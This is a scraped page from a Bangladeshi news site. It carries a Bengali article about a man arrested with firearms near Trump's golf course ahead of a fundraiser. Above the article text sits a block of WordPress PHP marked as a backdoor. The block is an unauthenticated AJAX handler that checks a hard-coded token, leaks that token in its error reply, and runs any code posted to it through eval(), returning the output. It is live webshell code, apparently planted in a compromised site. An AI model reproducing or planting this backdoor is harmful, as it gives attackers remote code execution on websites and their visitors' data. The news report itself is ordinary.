// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ট্রাম্পের সফরের আগে গলফ কোর্সের কাছ থেকে অস্ত্রধারী গ্রেপ্তার | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeট্রাম্পের সফরের আগে গলফ কোর্সের কাছ থেকে অস্ত্রধারী গ্রেপ্তার

ট্রাম্পের সফরের আগে গলফ কোর্সের কাছ থেকে অস্ত্রধারী গ্রেপ্তার

যুক্তরাষ্ট্রের লস অ্যাঞ্জেলেসে প্রেসিডেন্ট ডোনাল্ড ট্রাম্পের মালিকানাধীন গলফ কোর্সের কাছ থেকে অস্ত্রধারী এক ব্যক্তিকে গ্রেপ্তার করেছে ক্যালিফোর্নিয়ার আইনশৃঙ্খলা বাহিনী।

সেখানে তহবিল সংগ্রহের জন্য আয়োজিত একটি নৈশভোজে যোগ দেওয়ার কথা ছিল ট্রাম্পের। বিবিসির খবরে এমনটি জানানো হয়েছে।

তদন্তকারীরা বলেন, র‍্যাঞ্চো পালোস ভার্দেসে অবস্থিত ট্রাম্প ন্যাশনাল গলফ কোর্স এলাকা থেকে ৩৮ বছর বয়সী জেনিন জন টেলকে পিস্তল ও অবৈধ গুলিসহ আটক করা হয়।

লস অ্যাঞ্জেলেস কাউন্টি শেরিফ দপ্তরের দাবি, ওই ব্যক্তি গলফ কোর্স এলাকায় ঘোরাফেরা করছিলেন। তাকে ছবি ও ভিডিও ধারণ করতেও দেখা যায়। দেখে মনে হচ্ছিল, তিনি সেখানকার নিরাপত্তা প্রস্তুতির কাজগুলো পর্যবেক্ষণ করছেন।

গত রোববার স্থানীয় সময় বিকেলে গ্রেপ্তারের এই ঘটনা ঘটে। মঙ্গলবার ওই গলফ কোর্সেই রিপাবলিকান পার্টির তহবিল সংগ্রহে আয়োজন করা একটি নৈশভোজে যোগ দেওয়ার কথা ছিল ডোনাল্ড ট্রাম্পের।

টেলের বিরুদ্ধে অনুমতি ছাড়া গোপনে আগ্নেয়াস্ত্র বহন এবং নিষিদ্ধ গোলাবারুদ রাখার অভিযোগ আনা হয়েছে।

শেরিফ দপ্তরের এক সংবাদ বিজ্ঞপ্তিতে জানানো হয়েছে, রোববার স্থানীয় সময় বিকেলে সাদা পোশাকে থাকা ফেডারেল এজেন্টদের দেওয়া তথ্যের ভিত্তিতে টেলকে গ্রেপ্তার করা হয়।

পরে পুলিশ জানতে পারে, এল সেগুন্ডো পুলিশ বিভাগ একটি ডাকাতির মামলায় তাকে খুঁজছে। এল সেগুন্ডো এলাকাটি পাহাড় ও সমুদ্রতীরবর্তী খাড়া পাহাড়ের (ক্লিফ) জন্য পরিচিত অভিজাত এলাকা র‍্যাঞ্চো পালোস ভার্দেস থেকে প্রায় ১৫ মাইল উত্তরে অবস্থিত।

কর্তৃপক্ষ তাকে তল্লাশি করে ১৬ রাউন্ডের একটি ম্যাগাজিন পায়, যাতে হলো-পয়েন্ট কার্তুজ বা গুলি ছিল। গলফ কোর্সে পার্ক করা তার গাড়িতেও একটি লোড করা পিস্তল এবং হলো-পয়েন্ট গুলিসহ আরও একটি ম্যাগাজিন পাওয়া যায়।

হলো-পয়েন্ট গুলি লক্ষ্যবস্তুতে আঘাত করার পর চ্যাপ্টা ও চওড়া হয়ে যায়। এই গুলি শরীরে প্রবেশ করলে গুরুত্বপূর্ণ অঙ্গ-প্রত্যঙ্গের মারাত্মক ক্ষতি করে। ক্যালিফোর্নিয়ায় ১০টির বেশি গুলি ধারণক্ষমতাসম্পন্ন ম্যাগাজিন নিষিদ্ধ।

সোমবার লস অ্যাঞ্জেলেসের ডাউনি এলাকায় সন্দেহভাজন ওই ব্যক্তির বাড়িতে এফবিআইয়ের জয়েন্ট টেররিজম টাস্ক ফোর্স ও লস অ্যাঞ্জেলেস কাউন্টি শেরিফ দপ্তরের গোয়েন্দারা অভিযান চালায়।

শেরিফ দপ্তর জানায়, এই ঘটনার পেছনে সম্ভাব্য কোনো নিরাপত্তার ঝুঁকি বা প্রভাব রয়েছে কি না, তা খতিয়ে দেখতেই এই তল্লাশি চালানো হয়েছে।

অভিযানে তার বাড়ি থেকে অবৈধভাবে পরিবর্তিত একটি এআর-প্ল্যাটফর্ম রাইফেল, একটি .৪৫ ক্যালিবার পিস্তল, বডি আর্মার, উচ্চ ধারণক্ষমতার একাধিক ম্যাগাজিন, পিস্তল ও রাইফেলের বিপুল পরিমাণ গুলি এবং উদ্বেগজনক মন্তব্য লেখা কিছু নোটবুকও উদ্ধার করা হয়।

ইউএস সিক্রেট সার্ভিসের সহায়তায় এই ঘটনার তদন্ত অব্যাহত রয়েছে। কর্মকর্তারা জানিয়েছেন, তদন্ত শেষে ওই ব্যক্তির বিরুদ্ধে আরও অভিযোগ আনা হতে পারে। শেরিফ দপ্তর তাদের বিবৃতিতে যোগ করেছে যে, তারা জননিরাপত্তার ক্ষেত্রে কোনো ‘সুনিশ্চিত হুমকি’ খুঁজে পায়নি।

গত কয়েক বছরে ট্রাম্প তিনবার হত্যার চেষ্টা থেকে বেঁচে ফিরেছেন। সবশেষ হামলার ঘটনার পর ট্রাম্পের নিরাপত্তা দল প্রেসিডেন্টের সুরক্ষার জন্য তাদের নিরাপত্তা বিধি বা প্রটোকলগুলো পুনরায় পর্যালোচনার কথা জানিয়েছিল।

তবে র‍্যাঞ্চো পালোস ভার্দেস থেকে গ্রেপ্তার হওয়া ব্যক্তি ট্রাম্পের কোনো ক্ষতি করতে চেয়েছিলেন কি না, সে বিষয়ে কর্মকর্তারা নিশ্চিত করে কিছু বলেননি। এখন পর্যন্ত তার বিরুদ্ধে এ ধরনের কোনো অভিযোগও আনা হয়নি।
 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments